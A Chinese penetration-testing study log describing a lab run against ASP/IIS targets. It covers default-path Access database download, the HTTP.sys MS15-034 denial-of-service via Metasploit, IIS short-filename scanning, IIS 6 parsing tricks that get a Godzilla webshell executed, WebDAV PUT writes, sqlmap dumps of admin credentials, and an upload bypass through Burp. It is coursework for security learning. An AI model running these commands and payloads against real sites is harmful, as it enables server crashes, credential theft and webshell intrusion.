时间轴:
41天学习总结:
1.ASP因为access导致可以根据路径路由访问
2.HTTP.SYS蓝屏漏洞(使用msfconsole)
3.学习IIS短文件。使用IIS短文件对目录进行扫描可以得到简短的dir。
4.IIS文件解析,运用哥斯拉创造1.asp,进行连接。1.asp.jpg的绕过1.asp;.jpg。
如果写个文件夹1,将文件1.asp放入进去。发现访问不了,但如果文件夹名改为1.asp那就可以访问成功。
5.IIS写权限,由于两个写入未关闭,postman使用put写入3.txt。
6.模拟获得杭州电子科技大学的权限。
7.报错与容错界面的区分,使用sqlmap进行注入网站杭州电子科技大学。
8.通过三种方法寻找admin登录界面。
9.通化抓包修改重发获得权限
知识点:
1 、 ASP-SQL 注入 -Access 数据库
2 、 ASP- 默认安装 - 数据库泄漏下载
3 、 ASP-IIS-CVE& 短文件 & 解析 & 写入
章节点:
Web 层面: Web2.0 & Web3.0
语言安全: JS , ASP , PHP , NET , Java , Python 等(包含框架类)
OWTOP10 :注入,文件安全, XSS , RCE , XXE , CSRF , SSRF ,反序列化,未授权访问
等
业务逻辑:水平垂直越权,支付签约 & 购买充值,找回机制,数据并发,验证码 & 弱口令等
特殊漏洞: JWT , CRLF , CORS ,重定向, JSONP 回调,域名接管, DDOS ,接口枚举等
关键技术: POP 链构造, JS 逆向调试, NET 反编译, JAVA 反编译,代码解密,数据解
密等
Web3.0 :未待完续筹备中 ....
演示案例:
ASP-默认安装-MDB 数据库泄漏下载
ASP-中间件-CVE&短文件&解析&写权限
ASP-SQL 注入-SQLMAP 使用&ACCESS 注入
ASP-默认安装-MDB 数据库泄漏下载
由于大部分ASP程序与ACCESS数据库搭建,但ACCESS无需连接
在==脚本文件中定义配置好数据库路径即用,不需要额外配置安装数据库==
提前固定好的数据库路径如默认未修改,
当攻击者知道数据库的完整路径,可远程下载后解密数据实现攻击。
asp数据库与zblog数据库配置比较:
zblog安装程序:
asp安装程序:asp的路径C:\WebCode\fyblogs_3.0\database\#data.db。
数据库配置文件:
结论:asp无需安装直接使用。
案例(通过源码访问获取mdb):
1,打开虚拟机环境2003 企业版 32位 IIS 6.0 CN
2,右键我的电脑打开管理,选择Internet信息服务(IIS)→网站
3,选择对应的fyblogs_3.0 网站,查看分配的ip地址
4,通过其他主机访问该IP地址
5,成功访问后,通过访问对应下载路径,直接下载#data.mdb文件
#通常可以写成%23。
http://192.168.157.128:81/database/%23data.mdb
6,打开文件,发现其中==泄露用户名密码==等信息
7.通过源文件找到/admin。
可以通过浏览查看网站状态:
通过访问http://192.168.157.128:81/database/%23data.mdb:下载得到mdb文件
通过office访问:
可以在源码中找到后台位置:
通过访问http://192.168.157.128:81/admin/找到后台:
如何修改#data.mdb的位置:
C:\WebCode\fyblogs_3.0\database
修改两个conn.asp。
第一个C:\WebCode\fyblogs_3.0\include
第二个C:\WebCode\fyblogs_3.0
遇到问题:打开网址不能在正常打开
解决:将属性中的ip地址重新分配即可
HTTP.SYS(CVE-2015-1635)
1、漏洞描述
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
2、影响版本
Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2
3、漏洞利用条件
安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本
案例演示:
(kali安装)
【Kali】Kali在线安装详细教程【全】_kali安装-CSDN博客
Kali 更换源(非常详细),零基础入门到精通,看这一篇就够了_kali换源-CSDN博客
演示(蓝屏漏洞):
通过访问ipconfig得到ip,通过ip进行访问。
使用kali指令
curl -v 192.168.157.129 -H "Host:192.168.157.129" -H "Range: bytes=0-18446744073709551615
看到range知道此处有漏洞。
使用msfconsole:
漏洞复现
msfconsole
是==Metasploit Framework的命令行界面==,它是一个功能强大的渗透测试工具和漏洞利用框架。Metasploit Framework旨在帮助安全专业人员评估和测试计算机系统的安全性,包括发现漏洞、开发和执行攻击、获取远程访问权限等。
use auxiliary/dos/http/ms15_034_ulonglongadd
是Metasploit Framework中的一个辅助模块,用于执行针对MS15-034漏洞(也称为HTTP.sys远程代码执行漏洞)的拒绝服务(DoS)攻击。这个漏洞影响Windows操作系统中的HTTP堆栈,攻击者可以通过发送特制的HTTP请求导致**目标系统崩溃,从而实现拒绝服务攻击。**
REHOSTS:目标地址
RPORT:目标端口
使用指令:
msfconsole
use auxiliary/dos/http/ms15_034_ulonglongadd
可以show options查看选项
set rhosts 192.168.126.135
run
效果图:
使用run进行:
IIS短文件:
1、漏洞描述
此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
2、漏洞成因:
为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令**dir /x**
3、应用场景:
后台路径获取,数据库文件获取,其他敏感文件获取等
使用工具:
https://github.com/lijiejie/IIS_shortname_Scanner
使用 :
python iis_shortname_scan.py http://192.168.200.140:88/
扫描出来可以对应上:
还可以继续在某一个指定路径下扫描:
IIS文件解析
IIS 6 解析漏洞→可以上传木马文件,以图片形式或文件夹形式替换格式
1、该版本默认会将***.asp;.jpg** 此种格式的文件名,当成Asp解析
2、该版本默认会将***.asp/目录下的所有文件当成Asp解析**。
如:logo.asp;.jpg xx.asp/logo.jpg
IIS 7.x 解析漏洞
在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
应用场景:配合文件上传获取Webshell
演示一:
用哥斯拉生成一个1.asp
若直接放入网站进行访问可以显示进入成功。
如果改为1.asp.jpg放入不能打开。但如果改为1.asp;.jpg,显示可以使用。
如果写个文件夹1,将文件1.asp放入进去。发现访问不了,但如果文件夹名改为1.asp那就可以访问成功:
演示二:
IIS写权限
IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许
可以通过提交put包,进行写入文件(可置入木马,获得权限)
由于以上的写入开启导致使用postman的put写入一个3.txt进入网站:
ASP-SQL注入-SQLMAP使用&ACCESS注入
ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据,
所以在注入猜解中一般采用字典猜解表和列再获取数据,猜解简单但又可能出现猜解不到的情况
Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。
演示:
通过访问PIC.asp得到查询方法是通过改变select后面的值classid值。
区分好容错和报错:
报错:
容错:
使用sqlmap进行注入:
python .\sqlmap.py -u "http://192.168.157.128:89/Pic.asp?classid=3" ---tables
证明有漏洞出现:
使用第一个库,之后使用10线程来跑。当发现关键信息admin时可以停止。
G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐狸\gui_scan\sqlmap
python sqlmap.py -u "" --tables //获取表名
python sqlmap.py -u "" --cloumns -T admin //获取admin表名下的列名
python sqlmap.py -u "" --dump -C "username,password" -T admin //获取表名下的列名数据
python .\sqlmap.py -u "http://192.168.200.140:89/Pic.asp?classid=3" --tables
python .\\sqlmap.py: 启动 SQLMap 工具,使用 Python 解释器运行。
u "<http://192.168.200.140:89/Pic.asp?classid=3\>": 指定目标 URL,即要测试的网站地址。在这个例子中,目标 URL 是 http://192.168.200.140:89/Pic.asp?classid=3。u 选项用于指定 URL。
-tables: 指定 SQLMap 工具执行的任务,这里是获取数据库中的所有表。-tables 选项用于请求表的信息。
tables,columns,
据此,我将跑第二个列:(跑admin表下的列)
python .\sqlmap.py -u "http://192.168.157.128:89/Pic.asp?classid=3" --columns -T admin
据此,我需要password和username。
python .\sqlmap.py -u "http://192.168.157.128:89/Pic.asp?classid=3" --dump -C "username,password" -T admin
通过md5解密得到密钥:
接下来寻找登陆界面:
方法一:使用漏洞来猜:
python iis_shortname_scan.py http://192.168.157.128:89/
通过尝试访问:
http://192.168.157.128:89/upfile.asp
得到:
http://192.168.157.128:89/Tcnet/Admin_Login.asp
方法二:(通过7kb扫描获取访问路径)
方法三:
使用爬虫在新闻系统网页中寻找:
网页源代码771行。
获得网站权限:
通过访问http://192.168.157.128:89/upload.asp:
使用burpsuite进行抓包:
先对firefox进行配置:
工具-选项-高级-设置
burpsuite是在proxy settings里面
直接上传1.asp会显示上传类型不正确。
先上传一个正常的图像,进行抓包:
将其放入repeater当中:
对此进行修改发送,发现发送的值会在前面增加。
可以在前面增加1.asp;
上传成功后如图打开:
在发送方加入哥斯拉连接漏洞:
通过连接http://192.168.157.128:89/1.asp;2025381193763558.png 成功
成功获得权限:
本文章由李豆豆喵和番薯小羊卷~共同完成。